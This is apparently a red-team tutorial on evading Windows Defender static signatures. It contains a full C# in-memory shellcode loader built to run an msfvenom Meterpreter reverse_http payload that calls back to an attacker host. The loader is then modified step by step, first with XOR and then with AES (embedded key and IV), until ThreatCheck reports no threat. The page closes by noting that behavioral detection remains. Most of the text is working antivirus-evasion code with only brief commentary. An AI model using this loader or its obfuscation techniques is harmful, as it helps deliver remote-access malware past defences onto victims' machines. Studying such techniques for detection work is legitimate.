Static Analysis
Defender detection
PS C:\Tools\ExpandDefenderSig> Import-Module C:\Tools\ExpandDefenderSig\ExpandDefenderSig.ps1
PS C:\Tools\ExpandDefenderSig> ls "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{50326593-AC5A-4EB5-A3F0-047A75D1470C}\mpavbase.vdm" | Expand-DefenderAVSignatureDB -OutputFileName mpavbase.raw
Directory: C:\Tools\ExpandDefenderSig
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/9/2024 12:50 PM 79092299 mpavbase.raw
PS C:\Tools\ExpandDefenderSig> C:\Tools\Strings\strings64.exe .\mpavbase.raw | Select-String -Pattern "WNcry@2ol7"
WNcry@2ol7d
WNcry@2ol7
Bypass
using System;
using System.Linq;
using System.Runtime.InteropServices;
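namespace NotMalware
{
    /// <summary>
    /// Minimal in-process shellcode runner used as the baseline for the
    /// static-detection experiments on this page: allocate RW memory, copy the
    /// payload in, flip the page to RX, run it on a new thread and wait for it.
    /// </summary>
    internal class Program
    {
        // Win32 constants (memoryapi.h / winnt.h) so the calls below read without magic numbers.
        private const uint MEM_COMMIT = 0x1000;
        private const uint PAGE_READWRITE = 0x04;
        private const uint PAGE_EXECUTE_READ = 0x20;
        private const uint INFINITE = 0xFFFFFFFF;

        // SetLastError = true so a failed call can be reported via Marshal.GetLastWin32Error().
        [DllImport("kernel32", SetLastError = true)]
        private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32", SetLastError = true)]
        private static extern bool VirtualProtect(IntPtr lpAddress, UInt32 dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

        // lpThreadAttributes is a pointer and dwStackSize a SIZE_T, so both are declared
        // pointer-sized rather than UInt32 (the UInt32 version only worked because 0 was passed).
        [DllImport("kernel32", SetLastError = true)]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32", SetLastError = true)]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32", SetLastError = true)]
        private static extern bool CloseHandle(IntPtr hObject);

        /// <summary>
        /// Entry point; command-line arguments are ignored. Every Win32 call is checked
        /// and the program reports the error and returns instead of continuing blindly
        /// (the original ignored all return values and leaked the thread handle).
        /// </summary>
        static void Main(string[] args)
        {
            // Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
            byte[] buf = new byte[] {<SNIP>};

            if (buf.Length == 0)
            {
                Console.Error.WriteLine("No shellcode to run.");
                return;
            }

            // Allocate RW space for shellcode. The page is only made executable after the
            // copy, so RWX memory is never requested.
            IntPtr lpStartAddress = VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, MEM_COMMIT, PAGE_READWRITE);
            if (lpStartAddress == IntPtr.Zero)
            {
                Console.Error.WriteLine("VirtualAlloc failed: " + Marshal.GetLastWin32Error());
                return;
            }

            // Copy shellcode into allocated space
            Marshal.Copy(buf, 0, lpStartAddress, buf.Length);

            // Make shellcode in memory executable (RW -> RX). If this fails the thread
            // would start on a non-executable page, so stop here rather than crash later.
            UInt32 lpflOldProtect;
            if (!VirtualProtect(lpStartAddress, (UInt32)buf.Length, PAGE_EXECUTE_READ, out lpflOldProtect))
            {
                Console.Error.WriteLine("VirtualProtect failed: " + Marshal.GetLastWin32Error());
                return;
            }

            // Execute the shellcode in a new thread
            UInt32 lpThreadId = 0;
            IntPtr hThread = CreateThread(IntPtr.Zero, UIntPtr.Zero, lpStartAddress, IntPtr.Zero, 0, ref lpThreadId);
            if (hThread == IntPtr.Zero)
            {
                Console.Error.WriteLine("CreateThread failed: " + Marshal.GetLastWin32Error());
                return;
            }

            // Wait until the shellcode is done executing, then release the thread handle.
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
        }
    }
}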
Note: When creating a new project, make sure to select Console App (.NET Framework), and when compiling make sure to target x64 in Release mode. The msfvenom payload above is windows/x64, so a 32-bit build of the loader could not run it.
XOR Encryption
PS C:\Tools\NotMalware\NotMalware\bin\x64\Release> C:\Tools\ThreatCheck-master\ThreatCheck\ThreatCheck\bin\x64\Release\ThreatCheck.exe -f .\NotMalware.exe
XOR the shellcode with the value 0x5C (make sure to remove the new lines from the byte array first, as they break the recipe). Replace the shellcode in the program with the output, and then add a short loop which XORs each byte with 0x5C again just before writing the shellcode to memory — XOR is its own inverse, so applying the same key a second time restores the original bytes.
<SNIP>
// XOR'd shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
byte[] buf = new byte[] { <SNIP> }
// Allocate RW space for shellcode
<SNIP>
// Decode the XOR-obfuscated shellcode in place: XOR is its own inverse, so
// applying the same single-byte key (0x5C) restores the original bytes.
for (int idx = 0; idx < buf.Length; idx++)
{
    buf[idx] ^= 0x5c;
}
// Copy shellcode into allocated space
<SNIP>
Still detected:
AES Encryption
Modified code
<SNIP>
using System.Security.Cryptography;
namespace NotMalware
{
internal class Program
{
<SNIP>
static void Main(string[] args)
{
// Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
string bufEnc = "<SNIP>";
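// Decrypt shellcode.
// NOTE(review): the key and IV are embedded in the binary right next to the
// ciphertext, so this only hides the payload from static signature matching;
// anyone holding the executable can recover the plaintext. Aes.Create() is used
// with its default mode/padding, so the encryption side must have used the same.
byte[] key = new byte[16] { 0x1f, 0x76, 0x8b, 0xd5, 0x7c, 0xbf, 0x02, 0x1b, 0x25, 0x1d, 0xeb, 0x07, 0x91, 0xd8, 0xc1, 0x97 };
byte[] iv = new byte[16] { 0xee, 0x7d, 0x63, 0x93, 0x6a, 0xc1, 0xf2, 0x86, 0xd8, 0xe4, 0xc5, 0xca, 0x82, 0xdf, 0xa5, 0xe2 };
byte[] buf;
// Aes and ICryptoTransform are IDisposable; the original never disposed either,
// so both now live in the same using chain as the streams.
using (Aes aes = Aes.Create())
using (ICryptoTransform decryptor = aes.CreateDecryptor(key, iv))
using (var msDecrypt = new System.IO.MemoryStream(Convert.FromBase64String(bufEnc)))
using (var csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
using (var msPlain = new System.IO.MemoryStream())
{
    csDecrypt.CopyTo(msPlain);
    buf = msPlain.ToArray();
}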
// Allocate RW space for shellcode
<SNIP>
"No threat found!"
But ... behavioral detection: hiding the payload from static signatures does nothing about what the process does at runtime — allocating memory, flipping it to executable, starting a thread in it and calling back over HTTP (the reverse_http payload) — all of which remains visible to behavioral/runtime analysis.